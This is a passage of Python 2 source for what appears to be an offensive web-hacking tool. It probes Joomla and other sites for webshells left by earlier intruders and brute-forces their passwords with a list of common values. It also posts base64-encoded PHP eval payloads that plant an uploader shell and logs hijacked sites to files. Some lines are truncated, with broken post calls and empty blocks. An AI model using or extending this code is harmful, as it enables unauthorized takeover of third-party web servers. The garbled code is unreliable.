if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
docs_check = requests.get(SH12_O,timeout=15).content
if 'Index of' in docs_check and '.php' in docs_check :
shells = []
if re.findall(pattern_php,docs_check):
shells = re.findall(pattern_php,docs_check)
for shell in shells:
sh_check = requests.get(SH12_O+shell+'.php',timeout=15).content
if ' type="file"' in sh_check or ' type=\'file\'' in sh_check or ' type= "file"' in sh_check or ' type= \'file\'' in sh_check or ' type = "file"' in sh_check or ' type = \'file\'' in sh_check or ' type ="file"' in sh_check or ' type =\'file\'' in sh_check or ' type=file' in sh_check or ' type =file' in sh_check or ' type= file' in sh_check or ' type = file' in sh_check or 'Upload</a> ]</li><li>[' in sh_check or 'upload</a><li><a>Sym' in sh_check :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in sh_check :
nhzgrf ='.php',data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot ='.php',data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t ='.php',data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin ='.php',data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r ='.php',data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 ='.php',data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234 ='.php',data=password_1234,timeout=15).content
if ' type="file"' in p1234 or ' type=\'file\'' in p1234 or ' type= "file"' in p1234 or ' type= \'file\'' in p1234 or ' type = "file"' in p1234 or ' type = \'file\'' in p1234 or ' type ="file"' in p1234 or ' type =\'file\'' in p1234 or ' type=file' in p1234 or ' type =file' in p1234 or ' type= file' in p1234 or ' type = file' in p1234 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p12345 ='.php',data=password_12345,timeout=15).content
if ' type="file"' in p12345 or ' type=\'file\'' in p12345 or ' type= "file"' in p12345 or ' type= \'file\'' in p12345 or ' type = "file"' in p12345 or ' type = \'file\'' in p12345 or ' type ="file"' in p12345 or ' type =\'file\'' in p12345 or ' type=file' in p12345 or ' type =file' in p12345 or ' type= file' in p12345 or ' type = file' in p12345 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456 ='.php',data=password_123456,timeout=15).content
if ' type="file"' in p123456 or ' type=\'file\'' in p123456 or ' type= "file"' in p123456 or ' type= \'file\'' in p123456 or ' type = "file"' in p123456 or ' type = \'file\'' in p123456 or ' type ="file"' in p123456 or ' type =\'file\'' in p123456 or ' type=file' in p123456 or ' type =file' in p123456 or ' type= file' in p123456 or ' type = file' in p123456 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123123 ='.php',data=password_123123,timeout=15).content
if ' type="file"' in p123123 or ' type=\'file\'' in p123123 or ' type= "file"' in p123123 or ' type= \'file\'' in p123123 or ' type = "file"' in p123123 or ' type = \'file\'' in p123123 or ' type ="file"' in p123123 or ' type =\'file\'' in p123123 or ' type=file' in p123123 or ' type =file' in p123123 or ' type= file' in p123123 or ' type = file' in p123123 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123321 ='.php',data=password_123321,timeout=15).content
if ' type="file"' in p123321 or ' type=\'file\'' in p123321 or ' type= "file"' in p123321 or ' type= \'file\'' in p123321 or ' type = "file"' in p123321 or ' type = \'file\'' in p123321 or ' type ="file"' in p123321 or ' type =\'file\'' in p123321 or ' type=file' in p123321 or ' type =file' in p123321 or ' type= file' in p123321 or ' type = file' in p123321 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123456789 ='.php',data=password_123456789,timeout=15).content
if ' type="file"' in p123456789 or ' type=\'file\'' in p123456789 or ' type= "file"' in p123456789 or ' type= \'file\'' in p123456789 or ' type = "file"' in p123456789 or ' type = \'file\'' in p123456789 or ' type ="file"' in p123456789 or ' type =\'file\'' in p123456789 or ' type=file' in p123456789 or ' type =file' in p123456789 or ' type= file' in p123456789 or ' type = file' in p123456789 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p1234567890 ='.php',data=password_1234567890,timeout=15).content
if ' type="file"' in p1234567890 or ' type=\'file\'' in p1234567890 or ' type= "file"' in p1234567890 or ' type= \'file\'' in p1234567890 or ' type = "file"' in p1234567890 or ' type = \'file\'' in p1234567890 or ' type ="file"' in p1234567890 or ' type =\'file\'' in p1234567890 or ' type=file' in p1234567890 or ' type =file' in p1234567890 or ' type= file' in p1234567890 or ' type = file' in p1234567890 :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
phaurgeulis ='.php',data=password_haurgeulis,timeout=15).content
if 'Andela1C3' in phaurgeulis :
print ' -| '+site +'/ --> {}[Hacked]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
site_check = requests.get(site+'/',timeout=15).content
if ' type="file"' in site_check or ' type=\'file\'' in site_check or ' type= "file"' in site_check or ' type= \'file\'' in site_check or ' type = "file"' in site_check or ' type = \'file\'' in site_check or ' type ="file"' in site_check or ' type =\'file\'' in site_check or ' type=file' in site_check or ' type =file' in site_check or ' type= file' in site_check or ' type = file' in site_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('mylogin.txt', mode='a') as ccc:
ccc.write(site+'/ [Register or Contact]\n')
else :
up_check = requests.get(SH13_O,timeout=15).content
if ' type="file"' in up_check or ' type=\'file\'' in up_check or ' type= "file"' in up_check or ' type= \'file\'' in up_check or ' type = "file"' in up_check or ' type = \'file\'' in up_check or ' type ="file"' in up_check or ' type =\'file\'' in up_check or ' type=file' in up_check or ' type =file' in up_check or ' type= file' in up_check or ' type = file' in up_check or 'Upload</a> ]</li><li>[' in up_check or 'upload</a><li><a>Sym' in up_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH13_O+' [Hacked]\n')
else :
upload_check = requests.get(SH14_O,timeout=15).content
if ' type="file"' in upload_check or ' type=\'file\'' in upload_check or ' type= "file"' in upload_check or ' type= \'file\'' in upload_check or ' type = "file"' in upload_check or ' type = \'file\'' in upload_check or ' type ="file"' in upload_check or ' type =\'file\'' in upload_check or ' type=file' in upload_check or ' type =file' in upload_check or ' type= file' in upload_check or ' type = file' in upload_check or 'Upload</a> ]</li><li>[' in upload_check or 'upload</a><li><a>Sym' in upload_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH14_O+' [Hacked]\n')
else :
shell_check = requests.get(SH15_O,timeout=15).content
if ' type="file"' in shell_check or ' type=\'file\'' in shell_check or ' type= "file"' in shell_check or ' type= \'file\'' in shell_check or ' type = "file"' in shell_check or ' type = \'file\'' in shell_check or ' type ="file"' in shell_check or ' type =\'file\'' in shell_check or ' type=file' in shell_check or ' type =file' in shell_check or ' type= file' in shell_check or ' type = file' in shell_check or 'Upload</a> ]</li><li>[' in shell_check or 'upload</a><li><a>Sym' in shell_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
except :
print ' -| '+site +' --> {}[Failed]'.format(fr)
def Joomla2(site):
try :
site = URL(site)
SH1_J2 = site+'/modules/mod_simplefileuploadv1.3/elements/Clean.php'
SH2_J2 = site+'/modules/mod_simplefileuploadv1.3/elements/udd.php'
SH3_J2 = site+'/libraries/joomla/css.php'
SH4_J2 = site+'/libraries/joomla/jmails.php?u'
SH5_J2 = site+'/libraries/joomla/jmail.php?u'
SH6_J2 = site+'/images/vuln.php'
SH7_J2 = site+'/tmp/vuln.php'
SH8_J2 = site+'/XxX.php'
SH9_J2 = site+'/Marvins.php'
SH10_J2 = site+'/rxr.php?rxr'
SH11_J2 = site+'/modules/modules/modules.php'
SH12_J2 = site+'/olux.php'
SH13_J2 = site+'/indoxploit.php'
SH14_J2 = site+'/error.php'
SH15_J2 = site+'/RxR.php'
SH16_J2 = site+'/components/com_b2jcontact/izoc.php'
SH17_J2 = site+'/V3.php'
SH18_J2 = site+'/V5.php'
SH19_J2 = site+'/wso.php'
try :
wso_check = requests.get(SH19_J2,timeout=15).content
modules_check = requests.get(SH11_J2,timeout=15).content
except :
#modules_upload2 = {'itongtong':'eval(base64_decode("JGZvPWZvcGVuKCJGMHgucGhwIiwidyIpOwpmd3JpdGUoJGZvLGJhc2U2NF9kZWNvZGUoJ1BEOXdhSEFOQ21WamFHOGdJa2hoWTJ0bFpDQkNlU0JCYm05dWVXMXZkWE5HYjNoY2JpSTdEUXA3RFFva2MyRjNNU0E5SUNSZlJrbE1SVk5iSjJacGJHVW5YVnNuZEcxd1gyNWhiV1VuWFRzTkNpUnpZWGN5SUQwZ0pGOUdTVXhGVTFzblptbHNaU2RkV3lkdVlXMWxKMTA3RFFwbFkyaHZJQ0k4Wm05eWJTQnRaWFJvYjJROUoxQlBVMVFuSUdWdVkzUjVjR1U5SjIxMWJIUnBjR0Z5ZEM5bWIzSnRMV1JoZEdFblBnMEtQR2x1Y0hWMElIUjVjR1U5SjJacGJHVW5ibUZ0WlQwblptbHNaU2NnTHo0TkNqeHBibkIxZENCMGVYQmxQU2R6ZFdKdGFYUW5JSFpoYkhWbFBTZDFjR3h2WVdRZ2MyaGxiR3duSUM4K0RRbzhMMlp2Y20wK0lqc05DbTF2ZG1WZmRYQnNiMkZrWldSZlptbHNaU2drYzJGM01Td2tjMkYzTWlrN0RRcDlEUW8vUGc9PScpKTs="));'}
#modules_upload3 = {'itongtong':'eval(base64_decode("JGZvPWZvcGVuKCRfU0VSVkVSWyJET0NVTUVOVF9ST09UIl0uIi9pbWFnZXMvRjB4LnBocCIsInciKTsKZndyaXRlKCRmbyxiYXNlNjRfZGVjb2RlKCdQRDl3YUhBTkNtVmphRzhnSWtoaFkydGxaQ0JDZVNCQmJtOXVlVzF2ZFhOR2IzaGNiaUk3RFFwN0RRb2tjMkYzTVNBOUlDUmZSa2xNUlZOYkoyWnBiR1VuWFZzbmRHMXdYMjVoYldVblhUc05DaVJ6WVhjeUlEMGdKRjlHU1V4RlUxc25abWxzWlNkZFd5ZHVZVzFsSjEwN0RRcGxZMmh2SUNJOFptOXliU0J0WlhSb2IyUTlKMUJQVTFRbklHVnVZM1I1Y0dVOUoyMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRW5QZzBLUEdsdWNIVjBJSFI1Y0dVOUoyWnBiR1VuYm1GdFpUMG5abWxzWlNjZ0x6NE5DanhwYm5CMWRDQjBlWEJsUFNkemRXSnRhWFFuSUhaaGJIVmxQU2QxY0d4dllXUWdjMmhsYkd3bklDOCtEUW84TDJadmNtMCtJanNOQ20xdmRtVmZkWEJzYjJGa1pXUmZabWxzWlNna2MyRjNNU3drYzJGM01pazdEUXA5RFFvL1BnPT0nKSk7"));'}
if 'Mini shell' in requests.get(SH1_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[SimpleFileUpload]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Shell Uploader' in requests.get(SH2_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[SimpleFileUpload]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'walex says Fuck Off Kids:' in requests.get(SH3_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RCE]'.format(fg)
if 'BlesseD MAILER 2014' in requests.get(SH4_J2,timeout=15).content :
if 'w4l3XzY3 Mailer' in requests.get(SH5_J2,timeout=15).content :
with open('Shells.txt', mode='a') as d:
d.write(SH3_J2+' | '+SH4_J2+' | '+SH5_J2+'\n')
else :
with open('Shells.txt', mode='a') as d:
d.write(SH3_J2+' | '+SH4_J2+'\n')
else :
with open('Shells.txt', mode='a') as d:
elif 'BlesseD MAILER 2014' in requests.get(SH4_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RCE]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'w4l3XzY3 Mailer' in requests.get(SH5_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RCE]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Windows' in wso_check and 'Upload file:' in wso_check :
print ' -| '+site +'/ --> {}[WSO]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>Vuln!! patch it Now!</title>' in requests.get(SH6_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[ExploitJok3r]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>Vuln!! patch it Now!</title>' in requests.get(SH7_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[ExploitJok3r]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Tryag File Manager' in requests.get(SH8_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[TryagFileManager]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'config root man' in requests.get(SH9_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[WebShell]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'RxR HaCkEr' in requests.get(SH10_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RxR HaCkEr]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'WSO 2.6' in requests.get(SH12_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[Olux]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<title>IndoXploit</title>' in requests.get(SH13_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[IndoXploit]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'X_Shell' in requests.get(SH14_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[Hamdida]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'RxR HaCkEr' in requests.get(SH15_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[RxR HaCkEr]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'izocin' in requests.get(SH16_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[IZocin]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Dr HeX' in requests.get(SH17_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[DrHeX]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif 'Dr HeX' in requests.get(SH18_J2,timeout=15).content :
print ' -| '+site +'/ --> {}[DrHeX]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif '<' not in modules_check and '/modules/modules' in modules_check :
upShell =,data=modules_upload,timeout=15)
check = requests.get(site+'/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH11_J2+'#itongtong [POST] | {}/F0x.php [Succeeded]\n'.format(site))
else :
upShell =,data=modules_upload2,timeout=15)
check = requests.get(site+'/modules/modules/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH11_J2+'#itongtong [POST] | {}/modules/modules/F0x.php [Succeeded]\n'.format(site))
else :
upShell =,data=modules_upload3,timeout=15)
check = requests.get(site+'/images/F0x.php',timeout=15).content
if 'AnonymousFox' in check :
print ' -| '+site +'/ --> {}[ChinafansModules]'.format(fg)
with open('Shells.txt', mode='a') as d:
d.write(SH11_J2+'#itongtong [POST] | {}/images/F0x.php [Succeeded]\n'.format(site))
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
else :
print ' -| '+site +' --> {}[Failed]'.format(fr)
except :
print ' -| '+site +' --> {}[Failed]'.format(fr)
def Joomla1(site):
try :
site = URL(site)
pattern_themes1 = re.compile('templates/(.*)/favicon.ico')
pattern_themes2 = re.compile('templates/(.*)/js/')
pattern_themes3 = re.compile('templates/(.*)/css/')
pattern_themes4 = re.compile('(.*)/')
SH22_J = site+'/up.php'
SH23_J = site+'/upload.php'
SH24_J = site+'/shell.php'
try :
site_check = requests.get(site+'/',timeout=15).content
up_check = requests.get(SH22_J,timeout=15).content
upload_check = requests.get(SH23_J,timeout=15).content
shell_check = requests.get(SH24_J,timeout=15).content
except :
if re.findall(pattern_themes1,site_check):
theme = re.findall(pattern_themes1,site_check)
theme = theme[0]
while re.findall(pattern_themes4,theme) :
theme = re.findall(pattern_themes4,theme)
theme = theme[0]
elif re.findall(pattern_themes2,site_check):
theme = re.findall(pattern_themes2,site_check)
theme = theme[0]
while re.findall(pattern_themes4,theme) :
theme = re.findall(pattern_themes4,theme)
theme = theme[0]
elif re.findall(pattern_themes3,site_check):
theme = re.findall(pattern_themes3,site_check)
theme = theme[0]
while re.findall(pattern_themes4,theme) :
theme = re.findall(pattern_themes4,theme)
theme = theme[0]
else :
theme = 'system'
SH1_J = site+'/administrator/templates/bluestork/index.php'
SH2_J = site+'/administrator/templates/bluestork/error.php'
SH3_J = site+'/administrator/templates/hathor/index.php'
SH4_J = site+'/administrator/templates/hathor/error.php'
SH5_J = site+'/administrator/templates/isis/index.php'
SH6_J = site+'/administrator/templates/isis/error.php'
SH7_J = site+'/templates/beez/index.php'
SH8_J = site+'/templates/ja_purity/index.php'
SH9_J = site+'/templates/rhuk_milkyway/index.php'
SH10_J = site+'/templates/'+theme+'/index.php'
SH11_J = site+'/templates/'+theme+'/error.php'
SH12_J = site+'/templates/beez3/index.php'
SH13_J = site+'/templates/beez3/error.php'
SH14_J = site+'/templates/beez5/index.php'
SH15_J = site+'/templates/beez5/error.php'
SH16_J = site+'/templates/beez_20/index.php'
SH17_J = site+'/templates/beez_20/error.php'
SH18_J = site+'/templates/protostar/index.php'
SH19_J = site+'/templates/protostar/error.php'
SH20_J = site+'/templates/atomic/index.php'
SH21_J = site+'/templates/atomic/error.php'
password_nhzgrf = {'pass':'nhzgrf'}
password_root = {'pass':'root'}
password_r00t = {'pass':'r00t'}
password_admin = {'pass':'admin'}
password_t00r = {'pass':'t00r'}
password_123 = {'pass':'123'}
password_1234 = {'pass':'1234'}
password_12345 = {'pass':'12345'}
password_123456 = {'pass':'123456'}
password_123123 = {'pass':'123123'}
password_123321 = {'pass':'123321'}
password_123456789 = {'pass':'123456789'}
password_1234567890 = {'pass':'1234567890'}
password_haurgeulis = {'pass':'haurgeulis'}
password_rehan = {'password':'rehan'}
if ' type="file"' in site_check or ' type=\'file\'' in site_check or ' type= "file"' in site_check or ' type= \'file\'' in site_check or ' type = "file"' in site_check or ' type = \'file\'' in site_check or ' type ="file"' in site_check or ' type =\'file\'' in site_check or ' type=file' in site_check or ' type =file' in site_check or ' type= file' in site_check or ' type = file' in site_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('mylogin.txt', mode='a') as ccc:
ccc.write(site+'/ [Register or Contact]\n')
else :
if ' type="file"' in up_check or ' type=\'file\'' in up_check or ' type= "file"' in up_check or ' type= \'file\'' in up_check or ' type = "file"' in up_check or ' type = \'file\'' in up_check or ' type ="file"' in up_check or ' type =\'file\'' in up_check or ' type=file' in up_check or ' type =file' in up_check or ' type= file' in up_check or ' type = file' in up_check or 'Upload</a> ]</li><li>[' in up_check or 'upload</a><li><a>Sym' in up_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH22_J+' [Hacked]\n')
else :
if ' type="file"' in upload_check or ' type=\'file\'' in upload_check or ' type= "file"' in upload_check or ' type= \'file\'' in upload_check or ' type = "file"' in upload_check or ' type = \'file\'' in upload_check or ' type ="file"' in upload_check or ' type =\'file\'' in upload_check or ' type=file' in upload_check or ' type =file' in upload_check or ' type= file' in upload_check or ' type = file' in upload_check or 'Upload</a> ]</li><li>[' in upload_check or 'upload</a><li><a>Sym' in upload_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('UPloaders.txt', mode='a') as cc:
cc.write(SH23_J+' [Hacked]\n')
else :
if ' type="file"' in shell_check or ' type=\'file\'' in shell_check or ' type= "file"' in shell_check or ' type= \'file\'' in shell_check or ' type = "file"' in shell_check or ' type = \'file\'' in shell_check or ' type ="file"' in shell_check or ' type =\'file\'' in shell_check or ' type=file' in shell_check or ' type =file' in shell_check or ' type= file' in shell_check or ' type = file' in shell_check or 'Upload</a> ]</li><li>[' in shell_check or 'upload</a><li><a>Sym' in shell_check :
print ' -| '+site +'/ --> {}[Succeeded]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
SH1_J_content = requests.get(SH1_J,timeout=15).content
if ' type="file"' in SH1_J_content or ' type=\'file\'' in SH1_J_content or ' type= "file"' in SH1_J_content or ' type= \'file\'' in SH1_J_content or ' type = "file"' in SH1_J_content or ' type = \'file\'' in SH1_J_content or ' type ="file"' in SH1_J_content or ' type =\'file\'' in SH1_J_content or ' type=file' in SH1_J_content or ' type =file' in SH1_J_content or ' type= file' in SH1_J_content or ' type = file' in SH1_J_content or 'Upload</a> ]</li><li>[' in SH1_J_content or 'upload</a><li><a>Sym' in SH1_J_content :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
elif ' name=pass' in SH1_J_content :
nhzgrf =,data=password_nhzgrf,timeout=15).content
if ' type="file"' in nhzgrf or ' type=\'file\'' in nhzgrf or ' type= "file"' in nhzgrf or ' type= \'file\'' in nhzgrf or ' type = "file"' in nhzgrf or ' type = \'file\'' in nhzgrf or ' type ="file"' in nhzgrf or ' type =\'file\'' in nhzgrf or ' type=file' in nhzgrf or ' type =file' in nhzgrf or ' type= file' in nhzgrf or ' type = file' in nhzgrf :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
proot =,data=password_root,timeout=15).content
if ' type="file"' in proot or ' type=\'file\'' in proot or ' type= "file"' in proot or ' type= \'file\'' in proot or ' type = "file"' in proot or ' type = \'file\'' in proot or ' type ="file"' in proot or ' type =\'file\'' in proot or ' type=file' in proot or ' type =file' in proot or ' type= file' in proot or ' type = file' in proot :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pr00t =,data=password_r00t,timeout=15).content
if ' type="file"' in pr00t or ' type=\'file\'' in pr00t or ' type= "file"' in pr00t or ' type= \'file\'' in pr00t or ' type = "file"' in pr00t or ' type = \'file\'' in pr00t or ' type ="file"' in pr00t or ' type =\'file\'' in pr00t or ' type=file' in pr00t or ' type =file' in pr00t or ' type= file' in pr00t or ' type = file' in pr00t :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
padmin =,data=password_admin,timeout=15).content
if ' type="file"' in padmin or ' type=\'file\'' in padmin or ' type= "file"' in padmin or ' type= \'file\'' in padmin or ' type = "file"' in padmin or ' type = \'file\'' in padmin or ' type ="file"' in padmin or ' type =\'file\'' in padmin or ' type=file' in padmin or ' type =file' in padmin or ' type= file' in padmin or ' type = file' in padmin :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
pt00r =,data=password_t00r,timeout=15).content
if ' type="file"' in pt00r or ' type=\'file\'' in pt00r or ' type= "file"' in pt00r or ' type= \'file\'' in pt00r or ' type = "file"' in pt00r or ' type = \'file\'' in pt00r or ' type ="file"' in pt00r or ' type =\'file\'' in pt00r or ' type=file' in pt00r or ' type =file' in pt00r or ' type= file' in pt00r or ' type = file' in pt00r :
print ' -| '+site +'/ --> {}[bluestork]'.format(fg)
with open('Shells.txt', mode='a') as d:
else :
p123 =,data=password_123,timeout=15).content
if ' type="file"' in p123 or ' type=\'file\'' in p123 or ' type= "file"' in p123 or ' type= \'file\'' in p123 or ' type = "file"' in p123 or ' type = \'file\'' in p123 or ' type ="file"' in p123 or ' type =\'file\'' in p123 or ' type=file' in p123 or ' type =file' in p123 or ' type= file' in p123 or ' type = file' in p123 :
